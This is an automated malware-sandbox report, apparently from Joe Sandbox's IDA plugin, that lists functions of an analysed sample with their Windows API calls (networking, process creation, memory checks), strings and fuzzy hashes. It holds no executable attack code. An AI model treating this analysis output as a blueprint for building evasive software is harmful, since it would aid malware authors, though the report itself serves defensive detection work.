ReleaseDC.USER32(?), ref: 0023D8A3

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 729955c8faf436b5ded6581cd6647d89098bc8d77aab0a397d28503e6be88c2f
Instruction ID: c7223e0b281a260ecef46ef8ada1ceaed7fc89578bae018e1cc5e47891044ce0
Opcode Fuzzy Hash: 729955c8faf436b5ded6581cd6647d89098bc8d77aab0a397d28503e6be88c2f
Instruction Fuzzy Hash: 87E09A75800204DFCB51AFB5E84C66DBBB5BB48311B248449F95AE7250DB3959419F50

Function 00254D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 001E7620: _wcslen.LIBCMT ref: 001E7625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00254ED4

Strings

LPT, xrefs: 00254DFB
*, xrefs: 00254E10

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 76cf189a2f3df95b9078af750ab480fd9953e7ac32dd72bb30110668a70c2e00
Instruction ID: 23ed67ab3cda860ad7f18fd5416abbcca50228886dfeb70606d26cf1ac9012e8
Opcode Fuzzy Hash: 76cf189a2f3df95b9078af750ab480fd9953e7ac32dd72bb30110668a70c2e00
Instruction Fuzzy Hash: 9D9172759102459FDB14DF58C484EA9FBF1BF48308F148099E80A5F7A2C771ED99CB94

Function 00267771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0023569E,00000000,?,0027CC08,?,00000000,00000000), ref: 002678DD

Part of subcall function 001E6B57: _wcslen.LIBCMT ref: 001E6B6A

CharUpperBuffW.USER32(0023569E,00000000,?,0027CC08,00000000,?,00000000,00000000), ref: 0026783B

Strings

<s*, xrefs: 002677C8

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: BuffCharUpper$_wcslen
String ID: <s*
API String ID: 3544283678-228140549
Opcode ID: 753371017060c0a759b0d672925044ecd63bb7282b3aa987696eb3b1ea6592bc
Instruction ID: 8c62f38ebd39b66ed61901bdde3f34db715afecd14f00ec43145a60d0576e18c
Opcode Fuzzy Hash: 753371017060c0a759b0d672925044ecd63bb7282b3aa987696eb3b1ea6592bc
Instruction Fuzzy Hash: 9E618032924559ABCF04EFA5EC91DFDB3B4BF24304B944129F542B7091EF306A95DBA0

Function 001FE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 001FE1B1

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 9e9298409a9b7663a61122799138393ac341742c4f549635181787561603a1f3
Instruction ID: a061cfd13bebfbac95d06831e5b053dc2eea4fad011b87d1820e42858e6d90dd
Opcode Fuzzy Hash: 9e9298409a9b7663a61122799138393ac341742c4f549635181787561603a1f3
Instruction Fuzzy Hash: 115133B590024ADFDF18DF28C481ABEBBA8EF65310F254055F9919B2E0E7309D56CB90

Function 001FF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 001FF2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 001FF2BB

Strings

@, xrefs: 001FF2AF

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 033e56bb0b92b8644cd33605d4a5ad56dac7ce6c5e9987d87c37b451806fe363
Instruction ID: 8ae69c0b8b2fe8ea88015ae7c68dda2484deed2b6f781cd7d6c85a257261a667
Opcode Fuzzy Hash: 033e56bb0b92b8644cd33605d4a5ad56dac7ce6c5e9987d87c37b451806fe363
Instruction Fuzzy Hash: 62515771408B859BE320AF15EC86BAFBBF8FF95300F81885DF1D941195EB318529CB66

Function 00265745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 002657E0
_wcslen.LIBCMT ref: 002657EC

Strings

CALLARGARRAY, xrefs: 002657E6, 002657EB

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 036dcaedacf6886c260be450bad9ebc05bce51872d6265d1a35b1d1ebf5d75d8
Instruction ID: 90a15e91d4d68a7d51c1bce7c24ccf55096cbdf9735dc1622c741d157b8bd087
Opcode Fuzzy Hash: 036dcaedacf6886c260be450bad9ebc05bce51872d6265d1a35b1d1ebf5d75d8
Instruction Fuzzy Hash: A3419D71A2061A9FCB14DFA9C8859BEBBB5EF59320F104029E505A7292E7709DD1CB90

Function 0025D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0025D130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0025D13A

Strings

|, xrefs: 0025D10B

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 95b2f1b14d6049365ec30a4ce9c52f6bafcfda39343fe503c3687191685f62c7
Instruction ID: 8e0396b4b1be5a64bdbd2af9847a30a446dbce2cc356049370497b8b4a557de1
Opcode Fuzzy Hash: 95b2f1b14d6049365ec30a4ce9c52f6bafcfda39343fe503c3687191685f62c7
Instruction Fuzzy Hash: 90316F71D10209ABCF15EFA5CC85EEEBFB9FF14340F404059F819A6162DB31AA56CB64

Function 0027356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00273621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0027365C

Strings

static, xrefs: 002735BC

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 143b67c140cea473060c7ca5ac1cdac4d8557be5cf8ae25507cd58b9465f7b67
Instruction ID: 939c7a3bb165db3c644567242bff1fd777419d3fbfe4e8497aaf1c699bb0e65e
Opcode Fuzzy Hash: 143b67c140cea473060c7ca5ac1cdac4d8557be5cf8ae25507cd58b9465f7b67
Instruction Fuzzy Hash: 9031A171110605AADB10DF38DC40EBB73ADFF98720F50C619F86997180DB30AD91D764

Function 00274537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0027461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00274634

Strings

', xrefs: 0027458E

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 9ad8b5820369f52c36947fb1240e2bc48176fa83e4c9051554dbe950d43c0192
Instruction ID: a62dcb10aea65ad0260eed254c7d330420634f29db2c1d4043b48e193f8f8694
Opcode Fuzzy Hash: 9ad8b5820369f52c36947fb1240e2bc48176fa83e4c9051554dbe950d43c0192
Instruction Fuzzy Hash: 5D314874A0020A9FDB14DFA9C990BDA7BB9FF19300F50816AE908AB351D770E951CF90

Function 002731EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0027327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00273287

Strings

Combobox, xrefs: 00273249

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 7df6ccf0762e59b1f71a0ce357fbc962dea94190000e972e79c7a3456acfe1af
Instruction ID: 60093bc38e6696f153e62ad871647a548825352c3cfc5893eec911bccad7fffb
Opcode Fuzzy Hash: 7df6ccf0762e59b1f71a0ce357fbc962dea94190000e972e79c7a3456acfe1af
Instruction Fuzzy Hash: 401104713202097FFF25DF54DC84EBB376AEB983A4F208128F91CA7291D6319D619B60

Function 00273710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 001E600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001E604C
Part of subcall function 001E600E: GetStockObject.GDI32(00000011), ref: 001E6060
Part of subcall function 001E600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 001E606A

GetWindowRect.USER32(00000000,?), ref: 0027377A
GetSysColor.USER32(00000012), ref: 00273794

Strings

static, xrefs: 00273757

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: a05467fcf779489a6c9783ef635b38155809338a6212a7eec3eb43208d2a2f76
Instruction ID: e273a6dfd1aa585e52caa635fc0a43ad4d13879c58d3a6a7d506a141d084de9b
Opcode Fuzzy Hash: a05467fcf779489a6c9783ef635b38155809338a6212a7eec3eb43208d2a2f76
Instruction Fuzzy Hash: 30113AB262020AAFDF00DFB8DC49EEE7BB8FB09354F104918F959E2250D775E8619B50

Function 0025CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0025CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0025CDA6

Strings

<local>, xrefs: 0025CD66

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: f8e38a7a7e88d5b8871bccf896b7e02583300d26479268be01fcc7a85cc83bd2
Instruction ID: 2e12d1bff07a5123e3e74450290b28851ac8af3edc3ca1cd0847e3589f2fb6da
Opcode Fuzzy Hash: f8e38a7a7e88d5b8871bccf896b7e02583300d26479268be01fcc7a85cc83bd2
Instruction Fuzzy Hash: 1F11A7711267367ED7284A668C49FE7BEBCEB127A5F204239B509C2080E7705854D6F4

Function 00273429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 002734AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002734BA

Strings

edit, xrefs: 0027348F

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: b4eddd52bde2b46ea8a64b0299d8ed8540ec0e2881977a0d9c5a7eaba0e1ba77
Instruction ID: a3831f2eee671a7ec07b03ffbf318295fd6248750dee8c24e6ca847d7df30168
Opcode Fuzzy Hash: b4eddd52bde2b46ea8a64b0299d8ed8540ec0e2881977a0d9c5a7eaba0e1ba77
Instruction Fuzzy Hash: 5A11C171120109AFEB158E74EC54AFB376AEF15374F608324FA68931D0C771DCA1AB50

Function 00246C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

CharUpperBuffW.USER32(?,?,?), ref: 00246CB6
_wcslen.LIBCMT ref: 00246CC2

Strings

STOP, xrefs: 00246CBC, 00246CC1

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 70de8e7697279e6cd24b863d357e8e8c4e22c1f826cf4eba7f872d9ebcde15d1
Instruction ID: 1dcc8409a6ab7d514915c037839eaab4963fd837361df1eb33ad11448b33d924
Opcode Fuzzy Hash: 70de8e7697279e6cd24b863d357e8e8c4e22c1f826cf4eba7f872d9ebcde15d1
Instruction Fuzzy Hash: 68010432A205278BCB28AFFDDC888BF73A4EF627147500529E85297190EB31DC60CA51

Function 00241CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

Part of subcall function 00243CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00243CCA

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00241D4C

Strings

ComboBox, xrefs: 00241CEB
ListBox, xrefs: 00241D16

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 7632a41a73e40482e749d772a28e284a6ce72a5569381a6ddf040f06f98dea5e
Instruction ID: 5402f0d210e0ae6b6959414530c3dc8d220c508f497a880a48beaca9eb69241c
Opcode Fuzzy Hash: 7632a41a73e40482e749d772a28e284a6ce72a5569381a6ddf040f06f98dea5e
Instruction Fuzzy Hash: 11012871A20218AB8B1CFFA0CC51DFE7368FF57350B10090AF822572D1EB3059688660

Function 00241BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

Part of subcall function 00243CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00243CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 00241C46

Strings

ComboBox, xrefs: 00241BE5
ListBox, xrefs: 00241C10

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 20f41d9ffaae27b08ee6802d2024afd2847392415e73efa206c656c10b89cfe7
Instruction ID: 4076a9702c089cacb07be823f718416a197dad83a90c9b662d64254d0af6caef
Opcode Fuzzy Hash: 20f41d9ffaae27b08ee6802d2024afd2847392415e73efa206c656c10b89cfe7
Instruction Fuzzy Hash: 7D01A7756A111967CB1CFBA0DD91EFF77A89F22340F14041AE80667281EA609E7896B2

Function 00241C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

Part of subcall function 00243CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00243CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 00241CC8

Strings

ComboBox, xrefs: 00241C69
ListBox, xrefs: 00241C94

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: e71eb9618dd6c3f7ff2de06772febbe6411e6a28f2489320397b476519f3ea62
Instruction ID: fb3592076d08b7154b54af9adc785d352ed0c00fd94a6e9f53d7a7a0c6f12bb2
Opcode Fuzzy Hash: e71eb9618dd6c3f7ff2de06772febbe6411e6a28f2489320397b476519f3ea62
Instruction Fuzzy Hash: BC01DB716A011967CB18FBA1CE81EFF73AC9B22340F540416F80277281FA609F78D672

Function 001FA4D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 001FA529

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

Strings

,%+, xrefs: 001FA509
3y#, xrefs: 001FA545, 001FA54D, 001FA552

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Init_thread_footer_wcslen
String ID: ,%+$3y#
API String ID: 2551934079-568776299
Opcode ID: 695a6464267280cad084ad1882d9ca6599034005ac26c5155e28e2cc9b0fd2f2
Instruction ID: d39666769019047aff13c221d6583e705df655a2fce11e57fd0d035b9e208bbb
Opcode Fuzzy Hash: 695a6464267280cad084ad1882d9ca6599034005ac26c5155e28e2cc9b0fd2f2
Instruction Fuzzy Hash: B2014271A007189BC618F368EC4BABD33188F05720FD00128FA0A1B2D3EF149D068A97

Function 00278172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,002B3018,002B305C), ref: 002781BF
CloseHandle.KERNEL32 ref: 002781D1

Strings

\0+, xrefs: 0027818A

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

